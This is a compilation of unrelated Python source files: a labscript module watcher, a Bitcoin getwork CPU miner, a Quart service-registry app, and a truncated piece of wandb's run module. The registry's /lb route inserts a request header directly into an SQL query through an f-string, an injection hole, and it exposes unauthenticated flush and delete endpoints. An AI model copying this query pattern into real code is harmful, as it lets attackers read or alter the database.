| source | python |
|---|---|
modulewatcher.py
|
#####################################################################
# #
# modulewatcher.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the labscript suite (see #
# http://labscriptsuite.org) and is licensed under the Simplified #
# BSD License. See the license.txt file in the root of the project #
# for the full license. #
# #
#####################################################################
import sys
import threading
import time
import os
import imp
class ModuleWatcher(object):
def __init__(self):
# A lock to hold whenever you don't want modules unloaded:
self.lock = threading.Lock()
# The whitelist is the list of names of currently loaded modules:
self.whitelist = set(sys.modules)
self.modified_times = {}
self.main = threading.Thread(target=self.mainloop)
self.main.daemon = True
self.main.start()
def mainloop(self):
while True:
time.sleep(1)
with self.lock:
self.check_and_unload()
def check_and_unload(self):
# Look through currently loaded modules:
for name, module in sys.modules.copy().items():
# Look only at modules not in the whitelist:
if name not in self.whitelist and hasattr(module,'__file__'):
# Only consider modules which are .py files, no C extensions:
module_file = module.__file__.replace('.pyc', '.py')
if not module_file.endswith('.py') or not os.path.exists(module_file):
continue
# Check and store the modified time of the .py file:
modified_time = os.path.getmtime(module_file)
previous_modified_time = self.modified_times.setdefault(name, modified_time)
self.modified_times[name] = modified_time
if modified_time != previous_modified_time:
# A module has been modified! Unload all modules
# not in the whitelist:
message = '%s modified: all modules will be reloaded next run.\n'%module_file
sys.stderr.write(message)
# Acquire the import lock so that we don't unload
# modules whilst an import is in progress:
imp.acquire_lock()
try:
for name in sys.modules.copy():
if name not in self.whitelist:
# This unloads a module. This is slightly
# more general than reload(module), but
# has the same caveats regarding existing
# references. This also means that any
# exception in the import will occur later,
# once the module is (re)imported, rather
# than now where catching the exception
# would have to be handled differently.
del sys.modules[name]
if name in self.modified_times:
del self.modified_times[name]
finally:
# We're done mucking around with the cached
# modules, normal imports in other threads
# may resume:
imp.release_lock()
|
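A minimal usage sketch for the watcher above. The module path `modulewatcher`, the `run_user_script` helper, and its `path` argument are illustrative, not part of the original file: user code is executed while holding `lock`, so the background thread never unloads modules mid-run, and any non-whitelisted module the user code imported is unloaded once its source file changes.

```python
# Hypothetical usage sketch for ModuleWatcher; only ModuleWatcher itself
# comes from the file above, the rest is illustrative.
from modulewatcher import ModuleWatcher

watcher = ModuleWatcher()  # snapshots sys.modules as the whitelist

def run_user_script(path):
    # Hold the lock so the watcher cannot unload modules mid-execution:
    with watcher.lock:
        with open(path) as f:
            code = compile(f.read(), path, 'exec')
        exec(code, {'__name__': '__main__', '__file__': path})
```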
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
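# e.g. bytereverse(0x12345678) == 0x78563412 (reverses the byte order of a 32-bit word)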
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 26828
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
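The inner loop of `Miner.work` above is a double SHA-256 over the 80-byte block header, with a quick zero-suffix screen before the full `hash < target` comparison. A standalone sketch of that per-nonce check, written for Python 3 bytes and assuming the 76-byte header prefix is already in the byte order the miner prepares:

```python
import hashlib
import struct

def check_nonce(blk_hdr_76, nonce):
    """Double SHA-256 of a 76-byte header prefix plus a 32-bit nonce."""
    h1 = hashlib.sha256(blk_hdr_76 + struct.pack("<I", nonce)).digest()
    h2 = hashlib.sha256(h1).digest()
    # Quick screen used by the miner: the last four bytes of the second
    # hash must be zero before the expensive hash < target comparison.
    return h2[-4:] == b"\x00\x00\x00\x00", h2
```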
main.py
|
import os
import itertools
import json
import random
import socket
import time
from datetime import datetime
from threading import Thread
from typing import Dict, List
import pytz
import schedule
from quart import Quart, request, make_response
from dotenv import load_dotenv
from pg import PostgresDB
from service import Service, Status
from timer import Timer
app = Quart(__name__)
tz = pytz.timezone('America/Sao_Paulo')
timer = Timer()
services: Dict[str, List[Service]] = {}
load_dotenv()
database = os.getenv('database')
db_host = os.getenv('host')
db_user = os.getenv('username')
db_pass = os.getenv('password')
db = PostgresDB(host=db_host, db=database, user=db_user, password=db_pass)
@app.before_request
async def before_request():
timer.start = datetime.now(tz=tz)
return
@app.after_request
async def after_request(response):
timer.end = datetime.now(tz=tz)
total = f'{timer.diff()}s'
header = response.headers
header['Access-Control-Allow-Origin'] = '*'
header['Request-Duration'] = total
return response
@app.route('/lb', methods=["GET"])
async def get_service_lb():
headers = request.headers
execution = headers.get('X-Oystr-Execution', None)
if execution:
try:
# noinspection SqlDialectInspection, SqlNoDataSourceInspection
db.query(f"INSERT INTO metadata(execution) VALUES('{execution}');")
except Exception as e:
print(e)
return os.getenv('lb_address', '127.0.0.1:8080')
@app.route('/services', methods=["GET"])
async def find_all_active():
items = services.values()
data = [i for i in list(itertools.chain.from_iterable(items))]
as_dict = [d.__dict__ for d in data if d.status.status == 'running']
return \
await make_response(json.dumps(as_dict, default=lambda o: o.isoformat() if isinstance(o, datetime) else str(o))),\
200
@app.route('/services/all', methods=["GET"])
async def find_all():
items = services.values()
data = [i for i in list(itertools.chain.from_iterable(items))]
as_dict = [d.__dict__ for d in data]
return \
await make_response(json.dumps(as_dict, default=lambda o: o.isoformat() if isinstance(o, datetime) else str(o))),\
200
@app.route('/services/<service>/random', methods=["GET"])
async def find_one(service):
if not service or len(service) == 0:
return await make_response('service_id must be provided'), 400
elif service not in services.keys():
return await make_response(''), 404
data = list(filter(lambda i: i.status.status == 'running', services[service]))
size = len(data)
if size == 0:
return await make_response(''), 404
idx = random.randint(0, size - 1)
return await make_response(data[idx].json()), 200
@app.route('/services', methods=["POST"])
async def register():
req = await request.json
name = req.get('name', None)
service_id = req.get('service_id')
raw_port = req.get('port')
host = req.get('host')
res, code = await validate(service_id, host, raw_port, check_duplicate=False)
if res:
return res, code
port = int(raw_port)
service = Service(service_id=service_id, name=name, host=host, port=port, status=Status(None),
registered_at=datetime.now(tz=tz), last_health_check=None)
if service_id not in services:
services[service_id] = list()
services[service_id].append(service)
return await make_response(service.json()), 200
@app.route('/services/<service>/<host>/<port>', methods=["DELETE"])
async def deregister(service, host, port):
res, code = await validate(service, host, port)
if res:
return res, code
empty_res = await make_response('')
to_remove = [idx for idx in range(len(services[service])) if services[service][idx].host == host and
services[service][idx].port == port]
if len(to_remove) == 0:
return empty_res, 404
elif len(to_remove) != 1:
print(services)
print(to_remove)
return await make_response('more than one peer registered with the same service, host and port'), 409
idx = to_remove[0]
del services[service][idx]
return empty_res, 204
@app.route('/services/flush', methods=["DELETE"])
async def flush():
services.clear()
return await make_response(''), 204
async def validate(service, host, port, check_duplicate=True):
if not str(port).isnumeric():
return await make_response(f'port must be a number'), 400
elif not host or len(host) == 0:
return await make_response('host must be provided'), 400
elif not service or len(service) == 0:
return await make_response('service_id must be provided'), 400
elif check_duplicate and (service not in services.keys()):
return await make_response(''), 404
return None, -1
def health_check():
ids = services.values()
for items in ids:
for service in items:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
if service.status.status == 'disabled':
continue
# noinspection PyBroadException
try:
s.connect((service.host, service.port))
service.status = Status('running')
except Exception as _:
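# Failure state machine: first failure -> 'pending', then 'failing',
# then 'disabled'; disabled peers are skipped above and pruned by
# remove_disabled() below.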
if service.last_health_check and service.status.status == 'pending':
service.status = Status('failing')
continue
elif service.last_health_check and service.status.status == 'failing':
service.status = Status('disabled')
continue
service.status = Status('pending')
print(f'{service.service_id} [{service.status.status}] health checked')
finally:
service.last_health_check = datetime.now(tz=tz)
def run_scheduler():
while True:
schedule.run_pending()
time.sleep(1)
def remove_disabled():
services2 = services
for k, v in services2.items():
for idx, service in enumerate(v):
if service.status.status == 'disabled':
try:
del services[k][idx]
except Exception as e:
print(e)
schedule.every(30).seconds.do(health_check)
schedule.every(40).seconds.do(remove_disabled)
thread = Thread(target=run_scheduler, args=(), daemon=True)
thread.start()
app.run(host='0.0.0.0', port=10000)
|
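Since the registry above speaks plain HTTP/JSON, a client sketch is straightforward. This assumes the app is reachable on 127.0.0.1:10000 and uses the third-party `requests` library; the service name, host, and port values are illustrative:

```python
import requests

BASE = "http://127.0.0.1:10000"

# Register a peer (fields mirror the POST /services handler above).
resp = requests.post(f"{BASE}/services", json={
    "name": "crawler",
    "service_id": "crawler",
    "host": "10.0.0.5",
    "port": 8080,
})
print(resp.status_code, resp.text)

# Fetch a random running instance of that service.
print(requests.get(f"{BASE}/services/crawler/random").text)
```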
wandb_run.py
|
# File is generated by: tox -e codemod
# -*- coding: utf-8 -*-
from __future__ import print_function
import atexit
from datetime import timedelta
import glob
import json
import logging
import numbers
import os
import platform
import sys
import threading
import time
import traceback
import click
from six import iteritems, string_types
from six.moves import _thread as thread
from six.moves.collections_abc import Mapping
from six.moves.urllib.parse import quote as url_quote
from six.moves.urllib.parse import urlencode
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.errors import Error
from wandb.util import add_import_hook, sentry_set_scope, to_forward_slash_path
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_history
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .lib import (
apikey,
config_util,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
sparkline,
telemetry,
)
if wandb.TYPE_CHECKING: # type: ignore
from typing import (
Any,
Dict,
List,
Optional,
Sequence,
TextIO,
Tuple,
Union,
Type,
Callable,
)
from types import TracebackType
from .wandb_settings import Settings, SettingsConsole
from .interface.summary_record import SummaryRecord
from .interface.interface import BackendSender
from .lib.reporting import Reporter
from wandb.proto.wandb_internal_pb2 import (
RunRecord,
FilePusherStats,
PollExitResponse,
MetricRecord,
)
from .wandb_setup import _WandbSetup
from wandb.apis.public import Api as PublicApi
from .wandb_artifacts import Artifact
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from typing import NoReturn
from .data_types import WBValue
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
logger = logging.getLogger("wandb")
EXIT_TIMEOUT = 60
RUN_NAME_COLOR = "#cdcd00"
class ExitHooks(object):
exception = None
def __init__(self):
self.exit_code = 0
self.exception = None
def hook(self):
self._orig_exit = sys.exit
sys.exit = self.exit
sys.excepthook = self.exc_handler
def exit(self, code = 0):
orig_code = code
if code is None:
code = 0
elif not isinstance(code, int):
code = 1
self.exit_code = code
self._orig_exit(orig_code)
def was_ctrl_c(self):
return isinstance(self.exception, KeyboardInterrupt)
def exc_handler(
self, exc_type, exc, tb
):
self.exit_code = 1
self.exception = exc
if issubclass(exc_type, Error):
wandb.termerror(str(exc))
if self.was_ctrl_c():
self.exit_code = 255
traceback.print_exception(exc_type, exc, tb)
class RunStatusChecker(object):
"""Periodically polls the background process for relevant updates.
For now, we just use this to figure out if the user has requested a stop.
"""
def __init__(
self,
interface,
stop_polling_interval = 15,
retry_polling_interval = 1,
):
self._interface = interface
self._stop_polling_interval = stop_polling_interval
self._retry_polling_interval = retry_polling_interval
self._join_event = threading.Event()
self._stop_thread = threading.Thread(target=self.check_status)
self._stop_thread.daemon = True
self._stop_thread.start()
self._retry_thread = threading.Thread(target=self.check_network_status)
self._retry_thread.daemon = True
self._retry_thread.start()
def check_network_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_network_status()
if status_response and status_response.network_responses:
for hr in status_response.network_responses:
if (
hr.http_status_code == 200 or hr.http_status_code == 0
): # we use 0 for non-http errors (eg wandb errors)
wandb.termlog("{}".format(hr.http_response_text))
else:
wandb.termlog(
"{} encountered ({}), retrying request".format(
hr.http_status_code, hr.http_response_text.rstrip()
)
)
join_requested = self._join_event.wait(self._retry_polling_interval)
def check_status(self):
join_requested = False
while not join_requested:
status_response = self._interface.communicate_stop_status()
if status_response and status_response.run_should_stop:
# TODO(frz): This check is required
# until WB-3606 is resolved on server side.
if not wandb.agents.pyagent.is_running():
thread.interrupt_main()
return
join_requested = self._join_event.wait(self._stop_polling_interval)
def stop(self):
self._join_event.set()
def join(self):
self.stop()
self._stop_thread.join()
self._retry_thread.join()
class Run(object):
"""
A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`.
In distributed training, use `wandb.init()` to create a run for
each process, and set the group argument to organize runs into a larger experiment.
Currently there is a parallel Run object in the wandb.Api. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
# _telemetry_obj: telemetry.TelemetryRecord
# _teardown_hooks: List[Callable[[], None]]
# _tags: Optional[Tuple[Any, ...]]
# _entity: Optional[str]
# _project: Optional[str]
# _group: Optional[str]
# _job_type: Optional[str]
# _name: Optional[str]
# _notes: Optional[str]
# _run_obj: Optional[RunRecord]
# _run_obj_offline: Optional[RunRecord]
# Use string literal annotation because of type reference loop
# _backend: Optional["wandb.sdk.backend.backend.Backend"]
# _wl: Optional[_WandbSetup]
# _upgraded_version_message: Optional[str]
# _deleted_version_message: Optional[str]
# _yanked_version_message: Optional[str]
# _out_redir: Optional[redirect.RedirectBase]
# _err_redir: Optional[redirect.RedirectBase]
# _redirect_cb: Optional[Callable[[str, str], None]]
# _output_writer: Optional["filesystem.CRDedupedFile"]
# _atexit_cleanup_called: bool
# _hooks: Optional[ExitHooks]
# _exit_code: Optional[int]
# _run_status_checker: Optional[RunStatusChecker]
# _poll_exit_response: Optional[PollExitResponse]
# _sampled_history: Optional[Dict[str, Union[List[int], List[float]]]]
# _use_redirect: bool
# _stdout_slave_fd: Optional[int]
# _stderr_slave_fd: Optional[int]
# _pid: int
def __init__(
self,
settings,
config = None,
sweep_config = None,
):
self._config = wandb_config.Config()
self._config._set_callback(self._config_callback)
self._config._set_settings(settings)
self._backend = None
self.summary = wandb_summary.Summary(
self._summary_get_current_summary_callback,
)
self.summary._set_update_callback(self._summary_update_callback)
self.history = wandb_history.History(self)
self.history._set_callback(self._history_callback)
_datatypes_set_callback(self._datatypes_callback)
self._settings = settings
self._wl = None
self._reporter = None
self._entity = None
self._project = None
self._group = None
self._job_type = None
self._run_id = settings.run_id
self._start_time = time.time()
self._starting_step = 0
self._name = None
self._notes = None
self._tags = None
self._hooks = None
self._teardown_hooks = []
self._redirect_cb = None
self._out_redir = None
self._err_redir = None
self.stdout_redirector = None
self.stderr_redirector = None
self._save_stdout = None
self._save_stderr = None
self._stdout_slave_fd = None
self._stderr_slave_fd = None
self._exit_code = None
self._exit_result = None
self._final_summary = None
self._sampled_history = None
self._jupyter_progress = None
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
self._jupyter_progress = ipython.jupyter_progress_bar()
self._output_writer = None
self._upgraded_version_message = None
self._deleted_version_message = None
self._yanked_version_message = None
# Pull info from settings
self._init_from_settings(settings)
# Initial scope setup for sentry. This might get changed when the
# actual run comes back.
sentry_set_scope(
"user",
entity=self._entity,
project=self._project,
email=self._settings.email,
)
# Returned from backend request_run(), set from wandb_init?
self._run_obj = None
self._run_obj_offline = None
# Created when the run "starts".
self._run_status_checker = None
self._poll_exit_response = None
# Initialize telemetry object
self._telemetry_obj = telemetry.TelemetryRecord()
# Populate config
config = config or dict()
wandb_key = "_wandb"
config.setdefault(wandb_key, dict())
if settings.save_code and settings.program_relpath:
config[wandb_key]["code_path"] = to_forward_slash_path(
os.path.join("code", settings.program_relpath)
)
if sweep_config:
self._config.update_locked(
sweep_config, user="sweep", _allow_val_change=True
)
self._config._update(config, ignore_locked=True)
self._atexit_cleanup_called = False
self._use_redirect = True
self._progress_step = 0
self._pid = os.getpid()
def _telemetry_callback(self, telem_obj):
self._telemetry_obj.MergeFrom(telem_obj)
def _freeze(self):
self._frozen = True
def __setattr__(self, attr, value):
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp):
mods = sys.modules
if mods.get("torch"):
imp.torch = True
if mods.get("keras"):
imp.keras = True
if mods.get("tensorflow"):
imp.tensorflow = True
if mods.get("sklearn"):
imp.sklearn = True
if mods.get("fastai"):
imp.fastai = True
if mods.get("xgboost"):
imp.xgboost = True
if mods.get("catboost"):
imp.catboost = True
if mods.get("lightgbm"):
imp.lightgbm = True
if mods.get("pytorch_lightning"):
imp.pytorch_lightning = True
if mods.get("ignite"):
imp.pytorch_ignite = True
if mods.get("transformers"):
imp.transformers_huggingface = True
def _init_from_settings(self, settings):
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
def _make_proto_run(self, run):
"""Populate protocol buffer RunData for interface/interface."""
if self._entity is not None:
run.entity = self._entity
if self._project is not None:
run.project = self._project
if self._group is not None:
run.run_group = self._group
if self._job_type is not None:
run.job_type = self._job_type
if self._run_id is not None:
run.run_id = self._run_id
if self._name is not None:
run.display_name = self._name
if self._notes is not None:
run.notes = self._notes
if self._tags is not None:
for tag in self._tags:
run.tags.append(tag)
if self._start_time is not None:
run.start_time.FromSeconds(int(self._start_time))
# Note: run.config is set in interface/interface:_make_run()
def __getstate__(self):
pass
def __setstate__(self, state):
pass
@property
def dir(self):
"""
Returns:
(str): The directory where all of the files associated with the run are
placed.
"""
return self._settings.files_dir
@property
def config(self):
"""
Returns:
(Config): A config object (similar to a nested dict) of key
value pairs associated with the hyperparameters of the run.
"""
return self._config
@property
def config_static(self):
return wandb_config.ConfigStatic(self._config)
@property
def name(self):
"""
Returns:
(str): the display name of the run. It does not need to be unique
and ideally is descriptive.
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
@name.setter
def name(self, name):
self._name = name
if self._backend:
self._backend.interface.publish_run(self)
@property
def notes(self):
r"""
Returns:
(str): notes associated with the run. Notes can be a multiline string
and can also use markdown and latex equations inside $$ like $\\{x}"""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
@notes.setter
def notes(self, notes):
self._notes = notes
if self._backend:
self._backend.interface.publish_run(self)
@property
def tags(self):
"""
Returns:
(Tuple[str]): tags associated with the run
"""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
@tags.setter
def tags(self, tags):
self._tags = tuple(tags)
if self._backend:
self._backend.interface.publish_run(self)
@property
def id(self):
"""id property.
Returns:
(str): the run_id associated with the run
"""
if wandb.TYPE_CHECKING and TYPE_CHECKING:
assert self._run_id is not None
return self._run_id
@property
def sweep_id(self):
"""
Returns:
(str, optional): the sweep id associated with the run or None
"""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self):
"""
Returns:
(str): the path to the run `[entity]/[project]/[run_id]`
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self):
"""
Returns:
(int): the unix time stamp in seconds when the run started
"""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self):
"""
Returns:
(int): the first step of the run
"""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self):
"""
Returns:
(bool): whether or not the run was resumed
"""
if self._run_obj:
return self._run_obj.resumed
return False
@property
def step(self):
"""
Every time you call wandb.log() it will by default increment the step
counter.
Returns:
(int): step counter
"""
return self.history._step
def project_name(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
@property
def mode(self):
"""For compatibility with `0.9.x` and earlier, deprecate eventually."""
return "dryrun" if self._settings._offline else "run"
@property
def offline(self):
return self._settings._offline
@property
def disabled(self):
return self._settings._noop
@property
def group(self):
"""
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing a distributed training you should give all of the
runs in the training the same group.
If you are doing crossvalidation you should give all the crossvalidation
folds the same group.
Returns:
(str): name of W&B group associated with run.
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self):
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
@property
def project(self):
"""
Returns:
(str): name of W&B project associated with run.
"""
return self.project_name()
def log_code(
self,
root = ".",
name = None,
include_fn = lambda path: path.endswith(".py"),
exclude_fn = lambda path: os.sep + "wandb" + os.sep
in path,
):
"""
log_code() saves the current state of your code to a W&B artifact. By
default it walks the current directory and logs all files that end with ".py".
Arguments:
root (str, optional): The relative (to os.getcwd()) or absolute path to
recursively find code from.
name (str, optional): The name of our code artifact. By default we'll name
the artifact "source-$RUN_ID". There may be scenarios where you want
many runs to share the same artifact. Specifying name allows you to achieve that.
include_fn (callable, optional): A callable that accepts a file path and
returns True when it should be included and False otherwise. This
defaults to: `lambda path: path.endswith(".py")`
exclude_fn (callable, optional): A callable that accepts a file path and
returns True when it should be excluded and False otherwise. This
defaults to: `lambda path: os.sep + "wandb" + os.sep in path`
Examples:
Basic usage
```python
run.log_code()
```
Advanced usage
```python
run.log_code("../", include_fn=lambda path: path.endswith(".py") or path.endswith(".ipynb"))
```
Returns:
An `Artifact` object if code was logged
"""
name = name or "{}-{}".format("source", self.id)
art = wandb.Artifact(name, "code")
files_added = False
if root is not None:
root = os.path.abspath(root)
for file_path in filenames.filtered_dir(root, include_fn, exclude_fn):
files_added = True
save_name = os.path.relpath(file_path, root)
art.add_file(file_path, name=save_name)
# Add any manually staged files such as ipynb notebooks
for dirpath, _, files in os.walk(self._settings._tmp_code_dir):
for fname in files:
file_path = os.path.join(dirpath, fname)
save_name = os.path.relpath(file_path, self._settings._tmp_code_dir)
files_added = True
art.add_file(file_path, name=save_name)
if not files_added:
return None
return self.log_artifact(art)
def get_url(self):
"""
Returns:
A url (str, optional) for the W&B run or None if the run
is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_run_url()
def get_project_url(self):
"""
Returns:
A url (str, optional) for the W&B project associated with
the run or None if the run is offline
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_project_url()
def get_sweep_url(self):
"""
Returns:
A url (str, optional) for the sweep associated with the run
or None if there is no associated sweep or the run is offline.
"""
if not self._run_obj:
wandb.termwarn("URL not available in offline run")
return None
return self._get_sweep_url()
@property
def url(self):
"""
Returns:
(str): name of W&B url associated with run.
"""
return self.get_url()
@property
def entity(self):
"""
Returns:
(str): name of W&B entity associated with run. Entity is either
a user name or an organization name.
"""
return self._entity or ""
def _repr_mimebundle_(
self, include = None, exclude = None
):
url = self._get_run_url()
style = "border:none;width:100%;height:400px"
s = '<h1>Run({})</h1><iframe src="{}" style="{}"></iframe>'.format(
self._run_id, url, style
)
return {"text/html": s}
def _config_callback(
self,
key = None,
val = None,
data = None,
):
logger.info("config_cb %s %s %s", key, val, data)
if not self._backend or not self._backend.interface:
return
self._backend.interface.publish_config(key=key, val=val, data=data)
def _summary_update_callback(self, summary_record):
if self._backend:
self._backend.interface.publish_summary(summary_record)
def _summary_get_current_summary_callback(self):
if not self._backend:
return {}
ret = self._backend.interface.communicate_summary()
return proto_util.dict_from_proto_list(ret.item)
def _metric_callback(self, metric_record):
if self._backend:
self._backend.interface._publish_metric(metric_record)
def _datatypes_callback(self, fname):
if not self._backend:
return
files = dict(files=[(fname, "now")])
self._backend.interface.publish_files(files)
# TODO(jhr): codemod add: PEP 3102 -- Keyword-Only Arguments
def _history_callback(self, row, step):
# TODO(jhr): move visualize hack somewhere else
custom_charts = {}
for k in row:
if isinstance(row[k], Visualize):
config = {
"id": row[k].viz_id,
"historyFieldSettings": {"key": k, "x-axis": "_step"},
}
row[k] = row[k].value
self._config_callback(val=config, key=("_wandb", "viz", k))
elif isinstance(row[k], CustomChart):
custom_charts[k] = row[k]
custom_chart = row[k]
for k, custom_chart in custom_charts.items():
# remove the chart key from the row
# TODO: is this really the right move? what if the user logs
# a non-custom chart to this key?
row.pop(k)
# add the table under a different key
table_key = k + "_table"
row[table_key] = custom_chart.table
# add the panel
panel_config = custom_chart_panel_config(custom_chart, k, table_key)
self._add_panel(k, "Vega2", panel_config)
if self._backend:
not_using_tensorboard = len(wandb.patched["tensorboard"]) == 0
self._backend.interface.publish_history(
